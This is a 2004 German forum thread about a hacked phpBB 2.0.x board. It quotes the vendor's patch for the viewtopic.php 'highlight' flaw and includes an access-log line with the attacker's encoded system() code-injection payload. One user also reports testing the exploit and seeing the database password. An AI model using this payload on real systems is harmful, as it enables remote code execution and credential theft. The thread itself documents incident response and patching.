Wurm ? gehackt ?

higgy · Beitrag von **higgy** » 21.12.2004 09:00:29

Hi,
war heute n8 das Forum gehackt ?
Ist denn das phpbb 2.0.1 nicht sicher ?
Ich dachte das wär gefixt .. heul

Beitrag von **tracer** » 21.12.2004 09:06:27

Ich bin noch am reparieren.

Ich war seit zwei Stunden auf dem Rechner, bastelte an einer anderen Site, als mein VI mir erzählte, dass die Datei auf der Platte geändert wurde, an der ich gerade arbeite.

Ich versuche jetzt aus dem Backup alles zu recover, weiss aber nicht nicht, was passiert ist

mfg,
tracer

Richard · Beitrag von **Richard** » 21.12.2004 09:12:39

,

solche A***löcher, jetzt ist irgendwem ein achterl abgegangen oder wie ??..

Voll sinnig solche Aktionen

Richard

Beitrag von **tracer** » 21.12.2004 09:14:21

Ja, ich bin auch ganz schön gallig.

Ich vermute, ein Exploit im phpbb, kann es aber noch nicht genau sagen.

Dome · Beitrag von **Dome** » 21.12.2004 11:20:27

Following my original post it has been brought to our attention that the highlighting exploit can be taken advantage of, and it a serious way. We are hastily preparing a new release. However that release contains a number of other fixes and additions and thus we carrying out some internal testing to limit the chances of other issues arising.

In the mean time we strongly, and I mean strongly! urge all our users to make the following change to viewtopic.php as a matter of urgency.

Open viewtopic.php in any text editor. Find the following section of code:
Code:
Code: Alles auswählen
//
// Was a highlight request part of the URI?
//
$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
   // Split words and phrases
   $words = explode(' ', trim(htmlspecialchars(urldecode($HTTP_GET_VARS['highlight']))));

   for($i = 0; $i < sizeof($words); $i++)
   {
and replace with:
Code:
Code: Alles auswählen
//
// Was a highlight request part of the URI?
//
$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
   // Split words and phrases
   $words = explode(' ', trim(htmlspecialchars($HTTP_GET_VARS['highlight'])));

   for($i = 0; $i < sizeof($words); $i++)
   {
Please inform as many people as possible about this issue. If you're a hosting provider please inform your customers if possible. Else we advise you implement some level of additional security if you run ensim or have PHP running cgi under suexec, etc.

is das der hier evtl?
hab ich grad gefunden in google

ich werde das grade mal testen, hoffe du hast nix dagegen

Beitrag von **tracer** » 21.12.2004 11:38:45

Wo hast Du das gefunden?
Gibt es einen bug im urldecode?

Beitrag von **tracer** » 21.12.2004 11:49:38

So, habe das jetzt hier gefixed, und die Berechtigungen noch schärfer angezogen.
In TzaZickes Forum ist schon 2.0.11 im Einsatz.

mfg,
tracer

Dome · Beitrag von **Dome** » 21.12.2004 11:49:53

hoffentlich haste das update drauf gemacht
hab den link gefunden wie man den bug used
ging auch
hat man schön dein db name gesehn und passwort auch...

Beitrag von **tracer** » 21.12.2004 11:58:28

Und, funktioniert der Fix?

Dome · Beitrag von **Dome** » 21.12.2004 12:00:06

jop scheint so

Beitrag von **tracer** » 21.12.2004 18:21:59

Also, nu haben wirs, war nen Script Kiddie, das ne bekannte Sicherheitslücke mit bekannten Exploit verwendet hat.

Passiert mir nicht nochmal, hoffe ich.

Hier die Details, falls jemand Interesse hat:
195.149.227.13 - - [21/Dec/2004:07:11:29 +0100] "GET /viewtopic.php?p=4364&sid=dab898a1247b8ba2cd6ade97a0f04c31&highlight=%25
27%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%25
2echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%25
2echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%25
2echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%
252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)%2
52echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%25
2echr(34))%252e%2527 HTTP/1.0" 200 139054 "http://www.rchelifan.org/viewtopic.php? ... de97a0f04c
31&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32
)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)
%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102
)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(11
0)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(11
1)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78
)%252echr(41)%252echr(34))%252e%2527" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

und davon folgen dann halt etliche Einträge...

mfg,
tracer

Wurm ? gehackt ?

#1 Wurm ? gehackt ?

#2

#3

#4

#5

#6

#7

#8

#9

#10

#11